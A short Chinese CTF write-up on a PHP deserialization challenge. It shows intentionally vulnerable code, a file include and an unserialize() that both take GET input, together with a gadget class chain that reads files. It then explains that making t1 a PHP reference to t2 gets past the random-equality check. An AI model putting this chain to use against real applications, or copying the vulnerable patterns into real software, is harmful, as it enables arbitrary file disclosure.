记一题反序列化

<?php
error_reporting(0);
$file = $_GET["file"];
$p = $_GET["p"];
if (isset($file)) {
    echo 'NONONO' . '<br>';

    if (preg_match("/flag/", $file)) {
        die('HACKER GOGOGO!!!');
    }
    @include($file);

    if (isset($p)) {
        $p = unserialize($p);
    } else {
        echo "NONONO";
    }
}
?>
<!-- You can try ?file=xxxx, and check the code in try.php -->

try.php

<?php
class Seri{
    public $alize;
    public function __construct($alize) {
        $this->alize = $alize;
    }
    public function __destruct(){
        $this->alize->getFlag();
    }
}

class Flag{
    public $f;
    public $t1;
    public $t2;

    function __construct($file){
        echo "Another construction!!";
        $this->f = $file;
        $this->t1 = $this->t2 = md5(rand(1,10000));
    }

    public function getFlag(){
        $this->t2 = md5(rand(1,10000));
        echo $this->t1;
        echo $this->t2;
        if($this->t1 === $this->t2)
        {
            if(isset($this->f)){
                echo @highlight_file($this->f,true);
            }
        }
    }
}

?>

这个是12届信安大赛justsoso的简化版。

这里要调用$alize的getflag()，说明$alize必须是flag类。

这里唯一要考虑的问题是如何让t1和t2相等，两个都是随机的.

PHP和C不同的是引用

这里是指向同一个变量，让两个变量名指向同一个地址了，那么这必相等